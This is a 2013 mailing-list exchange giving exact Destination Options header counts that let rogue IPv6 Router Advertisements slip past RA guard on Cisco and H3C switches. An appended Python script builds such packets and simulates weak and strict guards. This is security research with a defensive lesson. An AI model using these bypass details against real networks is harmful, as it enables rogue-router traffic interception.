[ipv6hackers] RA guard evasion

Matej Gregr igregr at fit.vutbr.cz
Wed May 15 13:27:50 CEST 2013


On 05/15/2013 02:06 AM, Fernando Gont wrote:
> On 05/13/2013 11:24 AM, Matej Gregr wrote:
>> Hi guys,
>>   most of you are familiar with the concept of RA guard and its ability
>> to filter rogue RAs. We have tested 3 switches for access and
>> distribution layer and found that we are able to evade the protection
>> quite easily on all of them. The first method is using a fragment header and
>> this is well known and documented behaviour. However, you are also able
>> to evade the protection using several destination options headers (it
>> depends on the platform). We believe that this behaviour is not well
>> documented, so we wrote an article.
>> http://6lab.cz/article/rogue-router-advertisement-attack/
> 
> Do you mean that there's a difference between including one Dst Option
> Header (as in Section 2.1 of
> <http://tools.ietf.org/id/draft-ietf-v6ops-ra-guard-implementation-07.txt>)
> vs. multiple Dst Option headers?
> 
> Maybe it has to do with how many bytes into the packet the layer-2
> device can see/inspect?
> 
> Thanks!
> 
> Best regards,
> 

Yes Fernando, there is a difference.
If a Cisco switch with an RA guard policy receives an RA with one Dst Option
Header, it will drop the packet. If you concatenate six Dst Option
Headers, the Cisco switch will drop the packet. If you concatenate 7 or
more headers, it will forward it. However, if you concatenate more than
16 Dst Option headers, it will drop the packet. So, you can bypass the
RA guard policy by adding a number of Dst Option Headers between 7 and
15.
If the switch cannot parse the header chain in hardware, it should
punt it to software - which is actually happening with a header
chain of more than 15 extension headers, but is not happening with a header
chain 7 - 15 headers long.
It is not related to how many bytes the switch can see/inspect, because it
can parse even 50 headers without a problem and drop the packet.

H3C is able to parse 2 Dst Option headers. E.g., if you send an RA packet
with 1 or 2 Dst Option Headers, the switch will drop it. If you add
more, the switch will always forward the packet.

Regards,

M.
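The header-chain behaviour discussed in this thread, as an added example that is not part of the original post or of the 6lab article: the script below builds a valid ICMPv6 Router Advertisement (type 134, with an RFC 4443 checksum and one Prefix Information option) behind N chained Destination Options headers, then walks the Next Header chain the way an RA guard must. The guard is modelled two ways: a parser that gives up after a fixed number of extension headers and forwards whatever it could not classify (the fail-open behaviour the evasion relies on), and a parser that walks the whole chain and drops on any parse failure. The addresses (fe80::1, ff02::1, 2001:db8::/64) and the depth limit of 6 are constructed for the example and are not figures taken from the switches tested in the post.

```python
"""Build an ICMPv6 Router Advertisement behind N Destination Options headers
and walk the resulting header chain the way an RA guard has to."""
import ipaddress
import struct

NH_HOPBYHOP, NH_ROUTING, NH_DSTOPTS = 0, 43, 60   # TLV-style extension headers
NH_ICMPV6 = 58
ICMPV6_ROUTER_ADVERTISEMENT = 134

# Constructed sample addresses, not taken from the original post.
SRC = ipaddress.IPv6Address("fe80::1").packed          # rogue router, link-local
DST = ipaddress.IPv6Address("ff02::1").packed          # all-nodes multicast
PREFIX = ipaddress.IPv6Address("2001:db8::").packed    # advertised prefix


def dst_opts_header(next_header: int) -> bytes:
    """Minimal 8-byte Destination Options header: Next Header, HdrExtLen=0,
    then a 6-byte PadN option (type 1, length 4, four zero bytes) as filler."""
    return bytes([next_header, 0, 1, 4, 0, 0, 0, 0])


def icmpv6_checksum(src: bytes, dst: bytes, icmp: bytes) -> int:
    """RFC 4443 checksum: ones-complement sum over the IPv6 pseudo-header
    (src, dst, upper-layer length, zeros, next header) and the ICMPv6 message."""
    data = src + dst + struct.pack("!I", len(icmp)) + b"\x00\x00\x00" + bytes([NH_ICMPV6]) + icmp
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def router_advertisement(src: bytes, dst: bytes) -> bytes:
    """ICMPv6 RA (type 134): hop limit 64, M/O flags clear, router lifetime 1800 s,
    plus one Prefix Information option (type 3, 32 bytes) for PREFIX/64, L and A set."""
    header = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64, 0, 1800, 0, 0)
    prefix_opt = struct.pack("!BBBBIII", 3, 4, 64, 0xC0, 2592000, 604800, 0) + PREFIX
    msg = header + prefix_opt
    return msg[:2] + struct.pack("!H", icmpv6_checksum(src, dst, msg)) + msg[4:]


def build_packet(n_dst_opts: int) -> bytes:
    """Full IPv6 packet: fixed header, n_dst_opts chained Destination Options
    headers (each pointing at the next, the last one at ICMPv6), then the RA."""
    ra = router_advertisement(SRC, DST)
    chain = b"".join(
        dst_opts_header(NH_ICMPV6 if i == n_dst_opts - 1 else NH_DSTOPTS)
        for i in range(n_dst_opts)
    )
    first_nh = NH_DSTOPTS if n_dst_opts else NH_ICMPV6
    payload = chain + ra
    # Version 6, traffic class 0, flow label 0; hop limit 255 as RFC 4861 requires for an RA.
    fixed = struct.pack("!IHBB", 0x60000000, len(payload), first_nh, 255) + SRC + DST
    return fixed + payload


def walk_header_chain(pkt: bytes, max_headers=None):
    """Follow Next Header from the fixed header through the extension headers.
    Returns (extension header count, upper-layer protocol, ICMPv6 type or None),
    or None when the chain is longer than max_headers or the packet is truncated.
    Only the TLV-style headers (Hop-by-Hop, Routing, Destination Options) are
    followed; Fragment and AH use a different length encoding and end the walk."""
    nh, off, count = pkt[6], 40, 0
    while nh in (NH_HOPBYHOP, NH_ROUTING, NH_DSTOPTS):
        if max_headers is not None and count >= max_headers:
            return None
        if off + 2 > len(pkt):
            return None
        nh, off, count = pkt[off], off + (pkt[off + 1] + 1) * 8, count + 1
    if off >= len(pkt):
        return None
    return count, nh, (pkt[off] if nh == NH_ICMPV6 else None)


def ra_guard(pkt: bytes, max_headers=None, fail_open=False) -> str:
    """Policy decision for a frame from a non-router port. max_headers models how
    deep the parser follows the chain; fail_open models forwarding whatever it
    could not classify, which is the behaviour the evasion relies on."""
    parsed = walk_header_chain(pkt, max_headers)
    if parsed is None:
        return "forward" if fail_open else "drop"
    _, proto, icmp_type = parsed
    if proto == NH_ICMPV6 and icmp_type == ICMPV6_ROUTER_ADVERTISEMENT:
        return "drop"
    return "forward"


def evasion_table(max_headers: int, counts=range(0, 20)) -> dict:
    """For each Dst Options count: (decision of a depth-limited, fail-open guard,
    decision of a guard that walks the whole chain and drops on failure)."""
    return {n: (ra_guard(build_packet(n), max_headers, fail_open=True),
                ra_guard(build_packet(n)))
            for n in counts}


if __name__ == "__main__":
    for n, (weak, strict) in evasion_table(max_headers=6).items():
        print(f"{n:2d} Dst Opts headers: depth-limited guard -> {weak:7s} full walk -> {strict}")
```

Run stand-alone, the table shows the shape of the problem: every RA is dropped by the full walk, while the depth-limited, fail-open guard starts forwarding as soon as the chain is one header deeper than it can follow. To use the generated packets against a real switch you would still need to hand the bytes to a raw socket or a tool such as Scapy; the walker itself is the part an RA guard implementation must get right, and the defensive lesson is that an unparseable chain should be dropped or punted, never forwarded.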


